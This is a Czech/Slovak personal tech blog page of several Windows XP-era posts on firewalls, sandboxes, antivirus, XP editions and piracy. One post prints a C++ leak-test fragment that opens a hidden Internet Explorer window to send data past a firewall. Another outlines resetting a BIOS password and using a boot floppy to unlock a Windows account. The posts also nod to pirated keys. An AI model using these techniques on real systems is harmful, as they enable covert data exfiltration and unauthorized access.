MyEgo.cz - Radek Hulán webzine

Vyzkoušel jsem XPlite, skvělý produkt, který z Windows XP dokáže odstranit mraky balastu, nebezpečného a zpomalujícího, které tam Microsoft zanesl. Dokáže nejen zakázat různé services (jak jsem psal před 6 měsíci ve svém článku o bezpečnosti počítače s Windows), a odinstalovat je, ale hlavně to umí i pro services normálně nerozbrazené v services.msc. A těch jsou desítky…

V tomto článku bych chtěl ukázat, co vše se dá z Windows XP smazat, co jste dosud nikdy nepotřebovali, a potřebovat nikdy nebudete, co jen zabírá desítky MB paměti, zpomaluje drasticky celý Váš počítač, a činí jej méně bezpečným.

Moje domácí síť - konfigurace

Nejprve ale konfigurace mojí domácí sítě, tvoří ji jeden stolní počítač (P-IV/HT/3.2Ghz , 2x512MB DualChannel RAM) se SUSE 9.1 Linuxem (na druhém disku jsou ale i Windows XP SP2), potom Apple PowerBook G4 s MacOS X a Dell notebook s Windows XP SP2. Ty počítače jsou zasíťované gigabitovým ethernetem, a pro přenos a sdílení souborů používám tu nejlepší možnou metodu: FTP server na Linuxu a FTP server na MacOS X (oba jej nativně obsahují).

Pod Windows XP mám potom v Total Commanderu (Ctrl+F) nadefinováno připojení na FTP server PowerBooka a na SUSE Linux. Jednoduché, rychlé a funkční propojení tří rozdílných operačních systémů. Proč to popisuji? Protože osobně nepotřebuji věci jako je sdílení tiskáren, či samba klient na Linuxu, server či workstation služby na Windows XP, nebo ještě jiné služby na MacOS X. Vy ovšem možná ano.

Narazil jsem dnes na takový pěkný malý prográmek, má 3 KB z webu tooleaky.zensoft.com, který krásně ukazuje, proč je Vaše firewall zcela k ničemu. Již dávno jsem psal o tom, že nejen antivirus je k ničemu, ale, že k ničemu je i samotná firewall, pokud není provázána se SandBoxem.

Zkuste si ten prográmek schválně stáhnout a spustit. Stažení i spuštění zabere 10 sekund. Pokud se Vám ukáže “success”, máte problém. Ten prográmek totiž využívá léta známé chyby řady Windows firewallů, a totiž, autorizace přístupu MSIE na internet (nutné třeba pro online Windows Update), a následné zneužití MSIE jinými programy. Stačí na to pár řádků kódu v C++:

bool TransmitAndReceiveData ( ) {
 // Step 1: Find the MSIE
 char buffer[MAX_PATH + 512];
 long len = sizeof(buffer);
 RegQueryValueA(
 HKEY_LOCAL_MACHINE,
 "SOFTWARE\\Classes\\Applications"+
 "\\iexplore.exe\\shell\\open\\command",
 buffer,
 &len);
 // Step 2: spawn IE in a hidden window
 for ( char*c = &buffer[1]; *c != 0; c++ )
   if ( *c == '%' ) *c = 0;
 z_strcat(buffer, baseURL);
 z_strcat(buffer, outputString);
 WinExec(buffer, SW_HIDE);
 // Step 3: wait for the page to load
 int startCount = GetTickCount();
 do {
   EnumWindows(EnumWindowsProc, 0);
   if ( (GetTickCount() - startCount) > 30000 )
     return false;
 } while ( ieWnd == NULL );
 // Step 4: close the window
 SendMessage(ieWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
 return true;
}

Takto jednoduše může libovolný virus zavolat MSIE, které je autorizováno přistupovat k internetu, a potom libovolně zasílat, co se mu zlíbí. Pěkné, ne? Pokud jste aspoň jednou navštívili s MSIE nějakou warez či porno stránku, spustili si P2P klienta, nebo nějaký “keygen”, jen tak stažený z webu, je docela dost dobře možné, že na počítači máte škůdce. A to škůdce, kterého Vaše firewall nikdy neodhalí, a nezachytí jej ani antivirus či spyware (ty se skutečně nesoustředí na nákazy získané z warez a porno odkazů)…

Microsoftí firewall toto vůbec neumí, Tiny Personal Firewall, mnou preferovaná, to umí, ZoneAlarm Pro to sice umí, ale má to defaultně vypnuté i ve verzi 5.1.

Myslel som si, že Windows XP sú na trhu dostatočne dlho (4 roky) nato aby boli všetkým známe rozdiely medzi verziami Home Edition a Professional. Ale pri mojom nepravidelnom chatovaní som sa presvedčil, že opak je pravdou. O rozdieloch medzi Home a Professional kolujú mnohé fámy, ktorých výsledkom je, že Windows XP Home edition je na nič a každý nutne potrebuje verziu Professional.

Najčastejšie sa vyskytuje táto fáma: “S Windows XP Home nezosieťujem dva počítače, resp. Home má problém so sieťou”. To je absolútny nezmysel. Okrem práce v NT doméne, používajú obe verzie rovnaké sieťové prvky.

Skutočné rozdiely medzi Windows Home a Professional:

• Home nemá Remote Desktop.
• len Professional má podporu viacerých procesorov.
• Home nemá EFS - Encrypting File System.
• Professional má podporu "Windows Servers and management".
• Do Home sa nedajú inštalovať jazykové MUI.

Jejich řešení:

• Remote Desktop má na Windows platforme alternatívy: Symantec pcAnywhere, alebo free TightVNC.
• nepredpokladám, že niekto kto má viacprocesorový systém bude používať Windows.
• EFS sa takisto dá nahradiť: Iron Key. Navyše neexistuje ochrana ktorá by sa nedala prelomiť - viď prelomenie OpenPGP.
• Keď spĺňate tento bod, to už Windows XP Professional máte a najskôr tento článok vôbec nečítate.
• Ak už máte lokalizovanú verziu, jazykové paky nepotrebujete (alebo sa plánujete učiť japonsky?).

Na záver: Cenový rozdiel medzi týmito verziami je minimálne 1500 Kč. Pokiaľ máte Windows XP ukradnúť, ukradnite si Profi verziu. Ak ste spolu s počítačom dostali Windows Home ostaňte pri ňom. Ak nie ste fanúšikom Windows kúpte si Suse Home.

Všetky rozdiely nájdete na microsoft.com.

Poznámka Radka Hulána k článku: dnešní domácí uživatel má již poměrně běžně k dispozici procesor P-IV/HT, což je multi-procesorové řešení v jednom jediném chipu, zde je potřeba nasadit Windows XP Professional.

Rovněž SuSE 9.1 Personal, řešení, které osobně používám, není nutno kupovat, lze si je zdarma stáhnout z webu (a samozřejmě obsahuje systém pro jeden a více procesorů, dále programy pro internet, grafiku, Office, kvalitní firewall, a mnohé další).

Joel píše moc zajímavý (a rozsáhlý) článek nazvaný "Jak Microsoft prohrál API válku". Přečtěte si to! Pokud tedy umíte dobře anglicky. Joel zde píše o tom, že Microsoft od verze Windows 95 až po Windows XP udělal obrovské množství práce na tom, že zajistil, aby aplikace, které fungovaly ve Windows 98, byly plně funkční i ve Windows XP. Zní to zcela normálně? Přirozeně? No, ne až tak docela.

Některé aplikace fungovaly ve Windows 98 jen proto, že v nich byla chyba, v těch aplikacích, ne Windows. Ve Windows XP byla funkčnost změněna, a daná aplikace (SimCity, v tomto případě), nefunguje. Nicméně, OUW (obyčejný uživatel Windows) připisuje veškeré problémy Windows. OUW měl Windows 98. SimCity fungovalo. Má Windows XP. SimCity nefunguje. Zkuste OUW vysvětlit, že problém není ve Windows XP!

Raymond Chen je člověk, který stojí za týmem "zajištění kompatibility Windows". Jeho team jde tak daleko, že zkouší veškeré jen mírně populárnější aplikace pro Windows, a pokud nefungují, debaguje je, a pro danou aplikaci navrhuje speciální režim kompatibility, který emuluje starší chování Windows, specifické pro každou chybnou aplikaci, aby tato chybně napsaná aplikace fungovala očekávatelně i v nových systémech. Obrovská spousta práce! Nepředstavitelně obrovská.

A kde je tedy ten problém, že Microsoft prohrál válku?

Někdo mi dnes donesl počítač. Jsou na něm důležitá data. Ale nejde se k nim dostat. Huh. Zajímalo mě to. Naštěstí znám utilitku, která je schopna během jedné minuty vytvořit uživatele s právy administrátora na systému Windows XP, Windows 2000 a Windows NT 4.0. NTFS není problém. Utilitku, která je schopná rovněž editovat registry. A vše se to vleze na jednu bootovací disketu.

BIOS byl zaheslovaný. To není problém. Šroubovák, vytáhnout baterku na 10 sekund, aby se ztratila data v CMOSce, dát ji zpět. Potom boot z diskety. Nastavuji adminovi kompletní práva, resetuji počet přihlášení (účet byl zablokován), vypínám dotaz na heslo. Odstraňuji taky pár divných services a startup programů z registrů. Bootooji Windows XP. Za 2 minuty po tom, co mi někdo donesl počítač, se koukáme na data. Jak admin. :)

Jak na to? Zde je ona utilitka .

V dnešním, třetím, díle seriálu o bezpečnosti začnu poněkud netradičně. A to od konce. Nasměrujte svůj browser na grc.com. Další testy jsou dostupné na pcflank.com a scan.sygatetech.com. Pokud se Vám zobrazí něco jiného než následující tabulka, Vaše firewall má problém! A i pokud jej mít nebude, čtěte rovněž dál, protože firewall je jen malá část nutné bezpečnosti osobního počítače s Windows! Nepodléhejte falešnému pocitu bezpečí, potřebujete i sandbox!

GRC Port Authority Report
Results from scan of ports: 
 0, 21-23, 25, 79, 80, 110,
 113, 119, 135, 139, 143, 389, 443, 445, 
 1002, 1024-1030, 1720, 5000 
0 Ports Open 
0 Ports Closed 
26 Ports Stealth 
--------------------- 
26 Ports Tested 
ALL PORTS tested were found to be: STEALTH. 
TruStealth: PASSED - ALL tested ports were STEALTH, 
- NO unsolicited packets were received, 
  NO Ping reply (ICMP Echo) was received. 

Obsah:

• Díl 1: firewall a sandbox versus antivirus. Doporučený setup.
• Díl 2: řešení bezpečnosti pro Windows.
• Díl 3: praktické příklady nastavení firewallu.

Tato část seriálu by se chtěla zaměřit na konkrétní příklady použití Tiny Personal Firewall 5.5, což je, vzhledem ke své ceně, jednoznačně nejlepší řešení pro dokonalé zabezpečení počítače s Windows.

V předchozím díle článku Firewall je základ, antivir je k ničemu!, jsem se věnoval především tomu, k čemu slouží sandbox a firewall, a proč je použití antiviru spíše dodáním falešného pocitu bezpečí, než skutečným řešením.

Obsah:

• Díl 1: firewall a sandbox versus antivirus. Doporučený setup.
• Díl 2: řešení bezpečnosti pro Windows.
• Díl 3: praktické příklady nastavení firewallu.

Cíl tohoto článku: vysvětlit pokročilé principy nastavení a fungování firewallu a sandboxu.

Teď trochu více teorie, mírně zaměřené na Tiny Personal Firewall (existují i jiná řešení, nicméně TPF je mocné, a to jako firewall + sandbox, jiná řešení obvykle kombinují 2 i více softwarových balíků, které se hůř ovládají a vyjdou Vás i dráž).

Nicméně, teorie bezpečnosti je pochopitelně platná i pro jiné kombinace, než TPF.

Firewall slouží jako "filtr", který určuje, jaké procesy mohou komunikovat s okolním světem, a na kterým portech se, případně, počítač okolnímu světu otevře a bude naslouchat.

Komunikace se v zásadě dělí na:

• Outbound - výstupní, někdy v nastavení firewallu označovaná jako Local, Trusted Zone, či Allow Access.
• Inbound - vstupní, někdy označovaná také jako Server, či Internet.

V následujícím seriálu bych se chtěl věnovat bezpečnosti počítače připojeného k internetu, a to pro středně pokročilé uživatele. Seriál je rozdělen do 3 dílů.

Obsah:

• Díl 1: firewall a sandbox versus antivirus. Doporučený setup.
• Díl 2: řešení bezpečnosti pro Windows.
• Díl 3: praktické příklady nastavení firewallu.

Máte na svém počítači antivirus? Spoléháte se jen na něj, popřípadě ještě na triviální firewall ve Windows XP? No, potom je dost pravděpodobné, že to nejste jen Vy, kdo počítač “kontroluje”…

Antivirus je v dnešní době k ničemu. Pokud je Váš počítač připojen k internetu jen přes dial-up, či přes GPRS (zde je výhodou předřazená firewall providera), tak Vás antivirus nemá šanci ochránit. Při připojení pevnou linku, ADSL, WiFi je to ještě horší…

Antivirus je primitivní software, který hledá známé virové sekvence v operační paměti počítače, boot sektoru disku, a v souborech. Některé antiviry implementují navíc pop3 a smtp proxy, a hledají viry i v emailech a přílohách. Nicméně, přestože existuje heuristická analýza, tak antiviry na nové viry a zejména trojany a mallware nemají šanci.

Základem bezpečnosti je prevence. Léčit, antivirem, “nemocný” počítač je často marné, někdy je konečným řešením jen low-level formát disku a čistá instalace. Podobně jako je rozumnější prevence u lidí, tedy žít zdravě a jíst vitamíny, než… polykat velké dávky antibiotik, platí to i u bezpečnosti počítačů.

Instaloval jsem si dnes novou distribuci Linuxu - Mandrake 10, beta 2. Dost dobrý systém. Bez problémů fungoval i i-Tec Bluetooth dongle, který jsem kdysi, jako naprostý lama, rozcházel pod Mandrake 9.1 pár dní… A uvažoval jsem při tom, proč je vlastně aktivace Windows XP tak snadno překonatelná, proč na internetu kolují mraky corporate klíčů (které se neaktivují), a jejich generátorů. Osobně mám Windows XP koupené, měl jsem je neoddělitelně přibaleny ke svojí Dell Precision Workstation. Kdybych si je ale měl kupovat zvlášť (Windows XP), neudělal bych to. Instaloval bych si raději stažený Mandrake.

Myslím, že si to velice dobře uvědomuje i Microsoft… Linux není o tolik složitější na používání, jen řada lidí má stále podstatně lepší znalosti Windows NT 4.0 (2k, XP, 2003) než Linuxu. Hluboká znalost jakéhokoliv operačního systému není záležitostí měsíců, ale celých roků učení se, zkoušení, testování, programování, ladění, řešení problémů. A pro řadu lidí je prostě mnohem snazší, protože se tím zabývají déle, řešit problémy Windows, než Linuxu. Microsoft tudíž nechce, aby běžní lidé byli dokonalou aktivační rutinou Windows XP (a nechutí platit), tlačeni k tomu, aby své zkušenosti a znalosti Linuxu začali prohlubovat…

Pro Microsoft je velice výhodné, že většině lidí je snadno umožněno používat kradené, nelegální kopie Windows. Kdyby to nebylo možné, tito lidé by si de-facto museli osvojit Linux, a během několika málo let by přibylo značné množství odborníků na tento systém a pokročilých uživatelů, a značně by opadla všeobecná znalost Windows. To by, v důsledku, vedlo i k poklesu prodejů Windows samotných, jejich tržního podílů, a drastickému poklesu cen akcií Microsoftu. Bludný kruh úpadku…

Microsoft by samozřejmě mohl, například, při spuštění Windows Update kontrolovat, zda používaný klíč byl skutečně vydán, a pokud ne, takovouto instalaci Windows odmítnout inovovat, popřípadě ji rovnou smazat z disku. Microsoft to ale nechce udělat (s výjimkou 3 konkrétních, nejčastěji užívaných, kradených čísel, začínajících na poměrně zajímavá písmena FCKGW ;) - víte co to má být za zkratku?).

Uživatel, co používá doma, nelegálně Windows, je i uživatel, který si v práci objedná, koupí Windows. Uživatel, který by byl doma přinucen používat Linux, by si mohl i v práci vybrat Linux, a pravděpodobně by to i udělal, protože by mu byl známější. A to je nebezpečné!

Pak už můžeme jen spekulovat, kdo je skutečným autorem generátorů corporate klíčů pro Windows XP, Office XP a dalších. Je to skutečně nezávislý hacker, který chce tento systém, zdarma, zpřístupnit masám? Opravdu tomu věříte? V očích běžných lidí tím Microsoft jen získává roli „mučedníka“, který je poškozován, ať už je pravda jakákoliv…

Už dříve jsem psal, že nebýt mojí (dříve nelegální, a dnes koupené) instalace Opery, nebyl bych ke koupi dospěl, nebýt… keygenu. Operu bych pár měsíců s reklamou prostě nepoužíval. Když jsem si na ni zvyknul natolik, že nechci nic jiného, udělal jsem i dobrý čin, a skutečně si ji za 39 euro koupil…

A používání Windows je o tom samém. O znalostech, zvyku, dostupnosti.

Linuxová komunita by Microsoftu měla „pomoci“ - tím, že se pokusí zabránit šíření cracků na Windows XP a vyšších.:)